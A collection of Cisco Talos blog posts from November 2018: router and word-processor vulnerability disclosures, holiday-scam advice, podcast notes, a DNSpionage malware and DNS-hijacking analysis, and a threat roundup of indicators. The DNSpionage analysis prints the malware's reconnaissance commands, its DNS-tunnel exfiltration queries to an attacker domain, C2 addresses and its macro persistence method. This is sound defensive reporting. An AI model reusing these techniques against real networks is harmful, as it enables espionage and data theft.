Vulnerability Spotlight: Multiple remote vulnerabilities in TP-Link TL-R600VPN

November 19, 2018, 6:30 am

≫ Next: What scams shoppers should look out for on Black Friday and Cyber Monday

≪ Previous: Threat Roundup for Nov. 9 to Nov. 16

Vulnerabilities discovered by Jared Rittle of Cisco Talos.

Cisco Talos is disclosing multiple vulnerabilities in the TP-Link TL-R600VPN router. TP-Link produces a number of different types of small and home office (SOHO) routers. Talos discovered several bugs in this particular router model that could lead to remote code execution.

Overview

There are two root causes of the vulnerabilities: a lack of input sanitisation and parsing errors. The lack of proper input sanitisation leads the vulnerabilities TALOS-2018-0617/18, which can be exploited without authentication. Parsing errors are responsible for the vulnerabilities TALOS-2018-0619/20. However, these can only be exploited with an authenticated session. The remote code execution is done under the context of HTTPD However, since the HTTPD process is running under root, an attacker can run code with elevated privileges.

All vulnerabilities were found on HWv3 FRNv1.3.0 and HWv2 FRNv1.2.3, except for TALOS 2018-0620, which was found only on HWv3 FRNv1.3.0.

TALOS-2018-0617 — TP-Link TL-R600VPN HTTP denial of service

An exploitable denial-of-service vulnerability exists in the URI-parsing function of the TP-Link TL-R600VPN HTTP server. If a directory traversal is attempted on any of the vulnerable pages (help, images, frames, dynaform, localization) and the requested page is a directory instead of a file, the web server will enter an infinite loop, making the management portal unavailable. This request doesn't need to be authenticated.

CVE: CVE-2018-3948

A full technical advisory is available here.

TALOS-2018-0618 — TP-Link TL-R600VPN HTTP server information disclosure

An exploitable information disclosure vulnerability exists in the HTTP server functionality of the TP-Link TL-R600VPN. A directory traversal vulnerability exists in the TP-Link TL-R600VPN in both authenticated and unauthenticated forms. If a standard directory traversal is used with a base page of 'help,' the traversal does not require authentication and can read any file on the system.

CVE: CVE-2018-3949

A full technical advisory is available here.

TALOS-2018-0619 — TP-Link TL-R600VPN HTTP server ping address remote code execution

An exploitable remote code execution vulnerability exists in the ping and traceroute functions of the TP-Link TL-R600VPN HTTP server. The router does not check the size of the data passed to its 'ping_addr' field when performing a ping operation. By sending a large amount of data to this field, an attacker could cause a stack-based buffer overflow, leading to remote code execution or a simple crash of the device's HTTP server. An attacker would need to be in an authenticated session to trigger this vulnerability.

CVE: CVE-2018-3950

A full technical advisory is available here.

TALOS-2018-0620 — TP-Link TL-R600VPN HTTP server fs directory remote code execution

An exploitable remote code execution vulnerability exists in the HTTP header-parsing function of the TP-Link TL-R600VPN HTTP server. A specially crafted HTTP request can cause a buffer overflow, resulting in remote code execution on the device. During this process, the server calculates the length of the user-controlled HTTP header buffer and adds the value to the input buffer offset. This creates an overflow condition when the router processes a longer-than-expected GET request. An attacker needs to be authenticated to be able to trigger this vulnerability.

CVE: CVE-2018-3951

A full technical advisory is available here.

Discussion

Over the past year, Talos has disclosed various vulnerabilities in internet-of-things (IoT) devices and SOHO routers. These are just the latest example that these pieces of equipment are not only vulnerable, they also lack the generic operating systems protections that mitigate vulnerabilities like buffer overflows. Fortunately in the case of TL-R600VPN routers, the critical vulnerabilities that lead remote code execution need authentication. However, the code could be executed with root privileges.

Coverage

The following Snort IDs have been released to detect these vulnerabilities:

↧

What scams shoppers should look out for on Black Friday and Cyber Monday

November 19, 2018, 12:28 pm

≫ Next: Vulnerability Spotlight: Multiple remote code execution vulnerabilities in Atlantis Word Processor

≪ Previous: Vulnerability Spotlight: Multiple remote vulnerabilities in TP-Link TL-R600VPN

Every year, more and more Americans are taking care of their holiday shopping on Cyber Monday.

Last year, consumers spent a record $6.59 billion during the annual online shopping day, an all-time record, according to Adobe Insights. Still, that doesn’t mean no one is rushing out the night of Thanksgiving to do their shopping. Shoppers still went out in droves on Black Friday last year — Adobe estimated that Americans spent $2.43 billion on Nov. 25, 2017.

These two frenzied days open the door for bad actors to take advantage, hoping to trick uneducated consumers into clicking on malicious ads (a.k.a. malvertising) and emails disguised as shopping deals to phish credit card and personal information. Last year, 71 percent of emails that mentioned either “Black Friday” or “Cyber Monday” by name were classified as spam by Cisco Talos. Of that spam, 96 percent of the emails came from uncommon top-level domains (TLDs) such as .top, .stream, .trade and .bid.

One of the most prevalent domains associated with these emails is hxxp://bags-black-friday[.]top, which utilized the “hailstorm” method. This means that the attacker registered many domains and use them to send hundreds of spam emails in a matter of minutes, only to never use those domains again. Since those domains have no history in detection software, they can easily blow by security systems and land in users’ inboxes. The Cisco Umbrella data for bags-black-friday is below.

Based on last year’s metrics, Talos believes that there will be a similar spike in these kinds of emails after the holiday shopping season kicks off.

Talos has also seen several malicious sites hoping to capitalize on Black Friday and Cyber Monday. We have blacklisted several sites that contain either “Black Friday” or “Cyber Monday” directly in the URL name, indicating that attackers are hoping to draw customers in who are looking for deals specific to those shopping days. A complete list of these domains is in the “IOCs” section below.

Some of these URLs reference popular stores that often run sales, such as J.C. Penney and Pandora jewelry. There are several other malicious URLs that mention these holidays but have been inactive for an extended period of time as of Nov. 14. As we get closer to Thanksgiving, we anticipate that the number of URLs targeted at shoppers will rise, as well. It is typical of attackers to set up these malicious sites just as the shopping days are arriving, hoping to show up in internet searches and bypass the usual detection, as with the email campaigns mentioned above.

There are also specific malware attacks that have tried to capitalize on these “holidays.” For example, Microsoft discovered a malware campaign in 2016 that disguised itself as a special deal from online retailer Amazon that downloaded the Locky ransomware onto victim’s machines. Locky is a ransomware that’s been spread for years, mainly through email campaigns. Once launched, the malware will encrypt users’ files and ask for a payment in order to return the files. However, the threat of Locky has largely been wiped out by antivirus detection engines over the past year. (If you happen to be infected with Locky, we have an open-source decryptor here called “LockyDump” that can help you recover your files.)

With these numbers in mind, Talos recommends that shoppers take the following advice when planning to shop on Black Friday and Cyber Monday to protect themselves from common scams:

Ensure that you are only downloading apps from trusted and official app stores like the Google Play store and iOS App Store.
Look out for apps that ask for suspicious permissions, such as access to your text messages, contacts, stored passwords and administrative features.
Some malicious apps will try to masquerade as a legitimate version of the one you could be searching for. Signs of these apps include poor spelling and grammar in app descriptions and interfaces, lack of high-quality performance and a developer contact that uses a free email service (such as @gmail.com).
Avoid clicking on unsolicited emails. Make sure that you purposely subscribed to any marketing emails you are receiving from retailers.
Do not click on any files from untrusted sources. These often contain files that will execute unwanted programs on your machine.
Use an ad blocker locally on your browser. These will often block any malvertising campaigns that aim to capitalize on shoppers looking for deals.
Try to use payment services such as Google Pay, Samsung Pay and Apple Pay. These services use tokenization instead of the “Primary Account Number” (your credit card number), making your transaction more secure.
Use complex passwords that are unique, per site. Attackers commonly reuse passwords as a way to compromise multiple accounts with the same username.
If a deal sounds too good to be true, it probably is.

Our customers can detect and block these kinds of threats, as well, through a variety of our products.

IOCs

americanas-seguranca-blackfriday[.]oni[.]cc
blackfriday-deal-uk[.]com
blackfriday-shoping[.]com
blackfriday-uk-deal[.]com
blackfridaydiscountmuch[.]com
blackfridayonlineshoping[.]com
blackfridaysofasale[.]com
centralatendimento-2016-blackfriday[.]com[.]br[.]fewori20.mobi
discount-blackfriday[.]shop
discountblackfriday[.]shop
downloadfileshere[.]com/get/odelldaigneault.nm.ru_black-friday_Downloader_8911010.exe
jcpenney[.]black[.]friday[.]sales[.]cybersmondaydeals.com
mariiusblog[.]blogspot[.]com/search/label/reduceri%20black%20friday%202014
pandora-blackfriday-deal[.]com
ricardoeletro-blackfriday[.]com[.]br[.]dosd23-0[.]mobi
sale-blackfriday[.]shop
saleblackfriday[.]shop
shopblackfriday[.]shop
ssl-dados-blackfriday-ricardoeletro[.]com[.]br[.]dsdkowie0930[.]net/produtos/32882479/PlayStation-3-250GB-HD-Controle-Dual-Shock-3-Preto-Sem-Fio-Produto-Oficial-Sony-Compacto-03-Super-Jogos
Uk-blackfriday[.]com
jcpenney[.]black[.]friday[.]sales[.]cybersmondaydeals[.]com

↧

Vulnerability Spotlight: Multiple remote code execution vulnerabilities in Atlantis Word Processor

November 20, 2018, 7:35 am

≫ Next: Beers with Talos EP42: To the Moon, Everyone!

≪ Previous: What scams shoppers should look out for on Black Friday and Cyber Monday

A member of Cisco Talos discovered these vulnerabilities.

Executive summary

Today, Cisco Talos is disclosing three remote code execution vulnerabilities in the Atlantis Word Processor. Atlantis Word Processor is a traditional word processor that provides a number of basic features for users, in line with what is in other similar types of software. This application is written in Delphi and keeps the majority of its capabilities in a single, relocatable binary. An attacker could exploit these vulnerabilities to corrupt the memory of the application, which can result in remote code execution under the context of the application.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Atlantis to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Atlantis Word Processor open document format NewAnsiString length remote code execution vulnerability (TALOS-2018-0711/CVE-2018-4038)

The word processor contains an exploitable arbitrary write vulnerability in the open document format parser while trying to null-terminate a string. A specially crafted document could allow an attacker to pass an untrusted value as a length to a constructor, which miscalculates a length and then uses it to calculate the position to write a null byte. This particular bug lies in the `NewAnsiString` function.

For more information on this vulnerability, read the full advisory here.

Atlantis Word Processor Huffman table code length remote code execution vulnerability (TALOS-2018-0712/CVE-2018-4039)

Atlantis Word Processor contains an out-of-bounds write vulnerability in its PNG implementation. When opening a specially crafted document, which would need to be supplied by an attacker, the application fingerprints it in order to determine the correct file format parser. Eventually, an attacker could corrupt memory, which would allow them to execute arbitrary code in the context of the application. A user only needs to open the document to trigger this vulnerability.

For more information on this vulnerability, read the full advisory here.

Atlantis Word Processor rich text format uninitialized TAutoList remote code execution vulnerability (TALOS-2018-0713/CVE-2018-4040)

An exploitable uninitialized pointer vulnerability exists in the rich text format parser of Atlantis Word Procesor. A specially crafted document can cause certain RTF tokens to dereference an uninitialized pointer and then write to it. When opening up an RTF document, the application will first fingerprint it in order to determine the correct file format parser. Eventually, this would corrupt the memory of the application, allowing a user to execute code in the context of the application.

For more information on this vulnerability, read the full advisory here.

Versions tested

Talos tested and confirmed that Atlantis Word Processor, version 3.2.7.2 is affected by these vulnerabilities.

Conclusion

All three of these vulnerabilities are triggered by the user opening a malicious, specially crafted document. The easiest way to avoid these issues is for the user to ensure that they don’t open any documents from untrusted sources. The latest update from Atlantis will also cover these vulnerabilities, as will the Snort rules listed below.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 48385, 48386, 48389 - 48392

↧

Beers with Talos EP42: To the Moon, Everyone!

November 21, 2018, 12:19 pm

≫ Next: DNSpionage Campaign Targets Middle East

≪ Previous: Vulnerability Spotlight: Multiple remote code execution vulnerabilities in Atlantis Word Processor

Beers with Talos (BWT) Podcast Ep. #42 is now available. Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing, click here.

Ep. #42 show notes:

Recorded Nov. 16, 2018 —

Cyber moonshot, baby! It’s just like that time the US raced everyone to the moon, except completely different and in-no-way related! Do we need a “cyber moonshot”? Is the plan that was just released the way to get there? ...and holy crap if Craig didn’t actually prepare for this podcast with notes and everything.

We hope that you enjoy our rants over the Thanksgiving holiday break (for our American friends) or just at work like usual for the rest of you that don’t have a four day weekend ahead. We are genuinely grateful for you, listeners, as the entire reason that we get to keep doing this podcast. We enjoy having fun spreading the word on security and calling out excellence where we find it.

The timeline:

The topics

01:00 - Roundtable - Hi, Ellen. Enjoy your swag. Also, transition programs for vets we are supporting
12:26 - The Cyber Moonshot! That’s really all we talk about the whole hour. I know we mentioned other topics, but we just ranted way too long on the first topic.
1:00:19 - Closing thoughts and parting shots

The links

Cyber Moonshot draft report (public link)

==========

Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).
Hosted by Mitch Neff (@MitchNeff).
Find all episodes here.

Subscribe via iTunes (and leave a review!)

Check out the Talos Threat Research Blog

Subscribe to the Threat Source newsletter

Follow Talos on Twitter

Give us your feedback and suggestions for topics:
beerswithtalos@cisco.com

↧

DNSpionage Campaign Targets Middle East

November 27, 2018, 7:02 am

≫ Next: Threat Roundup for Nov. 23 to Nov. 30

≪ Previous: Beers with Talos EP42: To the Moon, Everyone!

This blog post was authored by Warren Mercer and Paul Rascagneres.

Update 2018-11-27 15:30:00 EDT: A Russian-language document has been removed. Subsequent analysis leads us to believe it is unrelated to this investigation.

Executive Summary

Cisco Talos recently discovered a new campaign targeting Lebanon and the United Arab Emirates (UAE) affecting .gov domains, as well as a private Lebanese airline company. Based on our research, it's clear that this adversary spent time understanding the victims' network infrastructure in order to remain under the radar and act as inconspicuous as possible during their attacks.

Based on this actor's infrastructure and TTPs, we haven't been able to connect them with any other campaign or actor that's been observed recently. This particular campaign utilizes two fake, malicious websites containing job postings that are used to compromise targets via malicious Microsoft Office documents with embedded macros. The malware utilized by this actor, which we are calling "DNSpionage," supports HTTP and DNS communication with the attackers.

In a separate campaign, the attackers used the same IP to redirect the DNS of legitimate .gov and private company domains. During each DNS compromise, the actor carefully generated Let's Encrypt certificates for the redirected domains. These certificates provide X.509 certificates for TLS free of charge to the user. We don't know at this time if the DNS redirections were successful.

In this post, we will break down the attackers' methods and show how they used malicious documents to attempt to trick users into opening malicious websites that are disguised as "help wanted" sites for job seekers. Additionally, we will describe the malicious DNS redirection and the timeline of the events.

Infection vectors

Fake job websites

The attackers' first attempt to compromise the user involved two malicious websites that mimicked legitimate sites that host job listings:

hr-wipro[.]com (with a redirection to wipro.com)
hr-suncor[.]com (with a redirection to suncor.com)

These sites hosted a malicious Microsoft Office document: hxxp://hr-suncor[.]com/Suncor_employment_form[.]doc.

The document is a copy of a legitimate file available on the website for Suncor Energy, a Canadian sustainable energy company, and contains a malicious macro.

At this time, we don't know how the target received these links. The attackers most likely sent the malicious document via email as part of a spear-phishing campaign, but it also could have circulated via social media platforms, such as LinkedIn, in an attempt to legitimize the opportunity for a new job.

Malicious Office document

Upon opening the first Office document, the user receives a message that says "Content Mode Available:"

Macros used

The macros of the analysed samples can be divided into two steps:

When the document is opened, the macro will decode a PE file encoded with base64 and will drop it in %UserProfile%\.oracleServices\svchost_serv.doc
When the document is closed, the macro will rename the file "svchost_serv.doc" to "svchost_serv.exe." Then, the macro creates a scheduled task named "chromium updater v 37.5.0" in order to execute the binary. The scheduled task is executed immediately and repeatedly every minute.

The purpose of these two steps is to avoid sandbox detection.

The payload is executed when Microsoft Office is closed, meaning it requires human interaction to deploy it. The macros, while available through analysis, are also password-protected in Microsoft Word to stop the victim from exploring the macro code via Microsoft Office.

Additionally, the macro uses classical string obfuscation in order to avoid strings detection:

The "schedule.service" string is created by concatenation. The final payload is a remote administration tool that we named "DNSpionage."

DNSpionage malware

Malware analysis

The malware dropped by the malicious document is an undocumented remote administration tool. We are naming it DNSpionage due to the fact that it supports DNS tunneling as a covert channel to communicate with the attackers' infrastructure.

DNSpionage creates its own data in the running directory:

%UserProfile%\.oracleServices/
%UserProfile%\.oracleServices/Apps/
%UserProfile%\.oracleServices/Configure.txt
%UserProfile%\.oracleServices/Downloads/
%UserProfile%\.oracleServices/log.txt
%UserProfile%\.oracleServices/svshost_serv.exe
%UserProfile%\.oracleServices/Uploads/

The Downloads directory is used by the attackers to store additional scripts and tools downloaded from the C2 server.

The Uploads directory is used by the attacker to temporarily store files before exfiltrating them to the C2 server.

The log.txt file contains logs in plain text.

All the executed commands can be logged in this file, it also contains the result of the commands.

The last file is Configure.txt. As expected, this file contains the malware configuration. The attackers can specify a custom command and control (C2) server URL, a URI and a domain that serves as a DNS covert channel. Additionally, the attackers can specify a custom base64 alphabet for obfuscation. We discovered that the attackers used a custom alphabet for each target.

All the data is transferred in JSON. That's why a large part of the code of the malware is the JSON library.

Communication Channels

The malware uses HTTP and DNS in order to communicate with the C2 server.

HTTP mode

A DNS request (to 0ffice36o[.]com) is performed with random data encoded with base64. This request registers the infected system and received the IP of an HTTP server (185.20.184.138 during the investigation). An example of a DNS request:

yyqagfzvwmd4j5ddiscdgjbe6uccgjaq[.]0ffice36o[.]com

The malware is able to craft DNS requests used to provide the attacker with further information. Here is an example of request:

oGjBGFDHSMRQGQ4HY000[.]0ffice36o[.]com

In this context, the first four characters are randomly generated by the malware using rand(). The rest of the domain is then encoded in base32, once decoded the value is 1Fy2048. "Fy" is the target ID and "2048" (0x800) means "Config file not found". The request is performed if the configuration file was not retrieved on the infected machine. This is a message is used to inform the attacker.

The malware performs an initial HTTP request to retrieve its configuration at hxxp://IP/Client/Login?id=Fy.

This request will be used to create the configuration file, particularly to set the custom base64 dictionary.

The second HTTP request is hxxp://IP/index.html?id=XX (where "XX" is the ID for the infected system)

The purpose of this request is to retrieve the orders. The site is a fake Wikipedia page:

The commands are included in the source code of the page:

In this example, the commands are encoded with a standard base64 algorithm because we did not receive a custom alphabet. Here is another example with a custom alphabet in the configuration file:

Here are the three commands automatically sent to the compromised system:

{"c": "echo %username%", "i": "-4000", "t": -1, "k": 0}
{"c": "hostname", "i": "-5000", "t": -1, "k": 0}
{"c": "systeminfo | findstr /B /C:\"Domain\"", "i": "-6000", "t": -1, "k": 0}

The malware generates the following snippet of code after executing those commands:

The attackers ask for the username and hostname to retrieve the infected user's domains. The first step is clearly a reconnaissance phase. The data is eventually sent to hxxp://IP/Client/Upload.

Finally, CreateProcess() executes the commands, and the output is redirected to a pipe to the malware created with CreatePipe().

DNS mode

The malware also supports a DNS-only mode. In this mode, the orders and answers are handled via DNS. This option is dictated within the configure.txt file on the infected machine. Using DNS can sometimes be easier to allow for information to be sent back to the attacker as it will generally avoid proxies or web filtering in place by leveraging the DNS protocol.

First, the malware initiates a DNS query to ask for orders, for example:

RoyNGBDVIAA0[.]0ffice36o[.]com

The first four characters must be ignored, as mentioned earlier in the article this is random generated characters, and the relevant data is GBDVIAA0. The decoded value (base32) is "0GT\x00". GT is the target ID and \x00 the request number. The C2 server replies with an answer to the DNS request, this will be an IP address, whilst not always a valid IP it is perfectly acceptable for the DNS protocol, for example 0.1.0.3. We believe the first value (0x0001) is the command ID for the next DNS request and 0x0003 is the size of the command.

Secondly, the malware performs a DNS query with the command ID:

t0qIGBDVIAI0[.]0ffice36o[.]com (GBDVIAI0 => "0GT\x01")

The C2 server will return a new IP: 100.105.114.0. If we convert the value in ASCII we have "dir\x00", the command to be execute.

Finally, the result of the executed command will be sent by multiple DNS request:

gLtAGJDVIAJAKZXWY000.0ffice36o[.]com -> GJDVIAJAKZXWY000 -> "2GT\x01 Vol"
TwGHGJDVIATVNVSSA000.0ffice36o[.]com -> GJDVIATVNVSSA000 -> "2GT\x02ume"
1QMUGJDVIA3JNYQGI000.0ffice36o[.]com -> GJDVIA3JNYQGI000 -> "2GT\x03in d"
iucCGJDVIBDSNF3GK000.0ffice36o[.]com -> GJDVIBDSNF3GK000 -> "2GT\x04rive"
viLxGJDVIBJAIMQGQ000.0ffice36o[.]com -> GJDVIBJAIMQGQ000 -> "2GT\x05 C h"
[...]

Victimology

Thanks to the DNS exfiltration and Cisco Umbrella, we are able to identify the origin of some of the victims and the period of activity in October and November. Here is the graph for 0ffice36o[.]com, the DNS we mentioned above:

The queries were performed from Lebanon and UAE. This information is confirmed by the DNS redirection described in the next section.

DNS redirection

Introduction

Talos discovered three IPs linked to the DNSpionage domain:

185.20.184.138
185.161.211.72
185.20.187.8

The three IPs are hosted by DeltaHost.

The last one was used in a DNS redirection attack between September and November. Multiple nameservers belonging to the public sector in Lebanon and UAE, as well as some companies in Lebanon, were apparently compromised, and hostnames under their control were pointed to attacker-controlled IP addresses. The attackers redirected the hostnames to the IP 185.20.187.8 for a short time. Just before redirecting the IP, the attackers created a certificate matching the domain name with the Let's Encrypt service.

In this section, we will present all the DNS redirection instances we identified and the attacker-generated certificates associated with each. We don't know if the redirection attack was ultimately successful, or what exact purpose the DNS redirection served. However, the impact could be significant, as the attackers were able to intercept all traffic destined for these hostnames during this time. Because the attackers targeted email and VPN traffic specifically, they may have been used to harvest additional information, such as email and/or VPN credentials.

As incoming email would also be arriving at the attackers' IP address, if there was multi-factor authentication, it would allow the attackers to obtain MFA codes to abuse. Since the attackers were able to access email, they could carry out additional attacks or even blackmail the target.

The DNS redirection we identified occurs in multiple locations where there is no direct correlation of infrastructure, staff, or job routines. It also occurs in both the public and private sectors. Therefore, we believe it was not human error, nor a mistake by an administrative user within any of the impacted organisations. This was a deliberate, malicious attempt by the attackers to redirect DNS.

Lebanon government redirection

Talos identified that the Finance Ministry of Lebanon's email domain was the victim of a malicious a DNS redirection.

webmail.finance.gov.lb was redirected to 185.20.187.8 on Nov. 6 06:19:13 GMT. On the same date at 05:07:25 a Let's Encrypt certificate was created.

UAE government redirection

UAE public domains were targeted, as well. We identified a domain from the Police (VPN and College) and the Telecommunication Regulatory Authority.

adpvpn.adpolice.gov.ae redirected to 185.20.187.8 on Sept. 13 at 06:39:39 GMT. The same date at 05:37:54 a Let's Encrypt certificate was created.
mail.mgov.ae redirected to 185.20.187.8 on Sept. 15 at 07:17:51 GMT. A Let's Encrypt certificate was also created at 06:15:51 GMT.
mail.apc.gov.ae redirected to 185.20.187.8 on Sept. 24. A Let's Encrypt certificate was also created at 05:41:49 GMT.

Middle East Airline redirection

Talos discovered that Middle East Airlines (MEA), a Lebanese airline, was also the victim of DNS redirection.

memail.mea.com.lb redirected to 185.20.187.8 on Nov. 14 at 11:58:36 GMT
On Nov. 6, at 10:35:10 GMT, a Let's Encrypt certificate was created.

This certificate contains alternative names in the subject lines, this is a feature with DNS to allow for multiple domains to be added to the certificate for SSL activities:

memail.mea.com.lb
autodiscover.mea.com.lb
owa.mea.com.lb
www.mea.com.lb
autodiscover.mea.aero
autodiscover.meacorp.com.lb
mea.aero
meacorp.com.lb
memailfr.meacorp.com.lb
meoutlook.meacorp.com.lb
tmec.mea.com.lb

These domains show a clear understanding of the victims' domains, leads us to believe the attacker was active in these environments to understand the specific domains and certificates they would be required to produce.

Conclusion

Our investigation discovered two events: the DNSpionage malware and a DNS redirection campaign. In the case of the malware campaign, we don't know the exact target, but we do know the attackers went after users in Lebanon and the UAE. However, as outlined above, we were able to uncover the targets of the redirect campaign.

We are highly confident that both of these campaigns came from the same actor. However, we do not know much about the location of the actors and their exact motivations. It is clear that this threat actor was able to redirect DNS from government-owned domains in two different countries over the course of two months, as well as a national Lebanese airline. They were able to work from the system's point of view by using a Windows malware, as well as the network, by using DNS exfiltration and redirection. It is unclear if these DNS redirection attacks were successful, but the attackers have kept up their efforts, launching five attacks so far this year, including one in the past two weeks.

Users should use these campaigns as proof that their endpoint protection as well as the network protection need to be as strong as possible. This is an advanced actor who obviously has their sights set on some important targets, and they don't appear to be letting up any time soon.

Coverage

Snort rules 48444 and 48445 will prevent DNSpionage from making an outbound connection.

Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Indicators of Compromise (IOCs)

The following IOCs are associated with various malware distribution campaigns that were observed during the analysis of associated malicious activity.

Fake job websites:

hr-wipro[.]com
hr-suncor[.]com

Malicious documents:

9ea577a4b3faaf04a3bddbfcb934c9752bed0d0fc579f2152751c5f6923f7e14 (LB submit)
15fe5dbcd31be15f98aa9ba18755ee6264a26f5ea0877730b00ca0646d0f25fa (LB submit)

DNSpionage samples:

2010f38ef300be4349e7bc287e720b1ecec678cacbf0ea0556bcf765f6e073ec 82285b6743cc5e3545d8e67740a4d04c5aed138d9f31d7c16bd11188a2042969
45a9edb24d4174592c69d9d37a534a518fbe2a88d3817fc0cc739e455883b8ff

C2 Server IPs:

185.20.184.138
185.20.187.8
185.161.211.72

C2 Server Domains:

0ffice36o[.]com

DNS Hijack Domains (pointed to 185.20.187.8):

2018-11-14 : memail.mea.com.lb
2018-11-06 : webmail.finance.gov.lb
2018-09-24 : mail.apc.gov.ae
2018-09-15 : mail.mgov.ae
2018-09-13 : adpvpn.adpolice.gov.ae

Domains in the MEA certificate (on 185.20.187.8):

memail.mea.com.lb
autodiscover.mea.com.lb
owa.mea.com.lb
www.mea.com.lb
autodiscover.mea.aero
autodiscover.meacorp.com.lb
mea.aero
meacorp.com.lb
memailr.meacorp.com.lb
meoutlook.meacorp.com.lb
tmec.mea.com.lb

↧

Threat Roundup for Nov. 23 to Nov. 30

November 30, 2018, 12:33 pm

≫ Next: Vulnerability Spotlight: Netgate pfSense system_advanced_misc.php powerd_normal_mode Command Injection Vulnerability

≪ Previous: DNSpionage Campaign Targets Middle East

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 23 and Nov. 30. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

The most prevalent threats highlighted in this roundup are:

Doc.Malware.Donoff-6759556-0
Malware
Donoff is a malicious Microsoft Office document that leverages the Windows Command shell to launch PowerShell and download and execute an executable.
Doc.Malware.00536d-6758981-0
Malware
Doc.Malware.00536d is the denomination of a set of malicious documents that leverage VBA and PowerShell to install malware on the system. These documents usually convince the user to enable macros that, if executed, will download and install additional malware on the system.
Xls.Dropper.Donoff-6758223-0
Dropper
Donoff is a payload delivery Office document that leverages the Windows Command shell to launch PowerShell to download and execute an executable.
Win.Trojan.Emotet-6758832-0
Trojan
Emotet is a banking trojan that has remained relevant due to its continual evolution to better avoid detection. It is commonly spread via malicious emails, and saw a resurgence recently during Black Friday.
Doc.Malware.Valyria-6757519-0
Malware
Valyria is a malicious Microsoft Word document family that is used to distribute other malware. This campaign is currently spreading Emotet.
Win.Virus.Triusor-6757540-0
Virus
Triusor is a highly polymorphic malware family. All the binaries are packed and obfuscated to hinder the static analysis. The malware contains code that complicates the dynamic analysis. Once it is executed, the samples perform code injection.

Threats

Doc.Malware.Donoff-6759556-0

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses contacted by malware. Does not indicate maliciousness

Domain Names contacted by malware. Does not indicate maliciousness

3ek6[.]top
pvy1[.]top
di29[.]top
68d4[.]top

Files and or directories created

%LocalAppData%\Temp\sDweD.exe
%LocalAppData%\Temp\22dughsl.5qd.ps1
%LocalAppData%\Temp\4s5lt2th.dfc.psm1
%LocalAppData%\Temp\4e5cllpa.loj.psm1
%LocalAppData%\Temp\zbaj2qbd.fvr.ps1

File Hashes

043a80eab9723a815096c7338c14105011f90c8fe1fe86a02c7c763726cfaa2a
06aa7214d492067f4f6a8aa0a910b5b32aee7734e0525a471bb2ca111ee6f3d0
09d47ec5acae65e60e8316435d57e75b8a0153458f4471c8ff3510ee2a809558
0a12a0000a78dfa623f71b0274df5b54f14dea7ddfe0799ad09cd76db2340441
0a137fefbe8edc0652e9eb4c6a9694a199d758241c5d2e5da98351771372d8f0
0b2a44c3b90bfc7c26605321c75fdc9703d67f71849cf106ef1e9fbd3160c533
0bdaed255c30cbce8a62153de694ffb80ede08f38ffd48706e415d457a21cbc1
0e12bab4d0a4c65141c6d16cc8401efda84373a667dfdca21f56b61466ef9e7d
0fe0f094572df903940dd8394c4c5c307705bb4146c794e77793f74a1e873327
121c49ab3eccc4472a13766f874b489b025ef1d5d9e1f8243085cb07290177c6
1459d9df5d2117263b051339baa35d5c28f54f5db6261135ea3d55c90e0985f7
16fa280526ab5a33bf77f4f86ffcf2a0b54c0733e26a2e070e724981927d1ad8
1792e52f31de940e6d233967b62bd6712deae048fc110ba38cea000314781c16
19badf1bbaa2ba68db14bf76e88b11a29492fb8d0cf180b83736a55d23a402be
1b409f2f2146c2318580c73d5eaeafbdd79e39d4d4f3e5862323b3b6f4a6c916
1cb58e56ae9f1a563e4789ee947f3941b90c5221f68ea0506da345fb63805826
1f312a61244c970d254c24055b714138835b839f1da36b9ee1cfc1acf636fbf1
24d62b3de48bf8b55b79fafcd17bf4a2cb8489a86358b26aa361193ad355dee4
25fbacf14f3ea9918aa054f040c6cc73edb9450a34e2fe739b131d9c155e3e3d
2696e57e2daac38a37ca382f979f1e4c61b20f516dd18ba33290fd00ef3eec7e
29de1616d80266c566605928b266a43dc9e1cb7c1a1ed9c95e32d54efd4f6696
2af5928b3dfeaeff2556b7fbf27ef564c0a67457ef2ec6ac41dcfdb214b84856
2caaf8bad60e3e663993727b5ff26d685fb511892f90939d04e5f92765154687
2eab620737103e94f0dcd33163071e8c0bd1cdaaf42c1d2e254d3e5e71851b24
33d98771535a91ad332f2e59969b9f51a2bf811dbe886208e139e456cd124631

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Malware

Doc.Malware.00536d-6758981-0

Indicators of Compromise

Registry Keys

Mutexes

_!SHMSFTHISTORY!_

IP Addresses contacted by malware. Does not indicate maliciousness

Domain Names contacted by malware. Does not indicate maliciousness

cysioniven[.]com

Files and or directories created

%LocalAppData%\Temp\ebeqjwi0.znf.ps1
%LocalAppData%\Temp\xnakv4n3.jj0.psm1
%LocalAppData%\Temp\glq130qw.p3e.psm1
%LocalAppData%\Temp\haoyv1sm.xuc.ps1
%AppData%\900194a4.exe

File Hashes

0ef9bfca2a912149f417a562853084d460565bdea22574d5f16d148905162d07
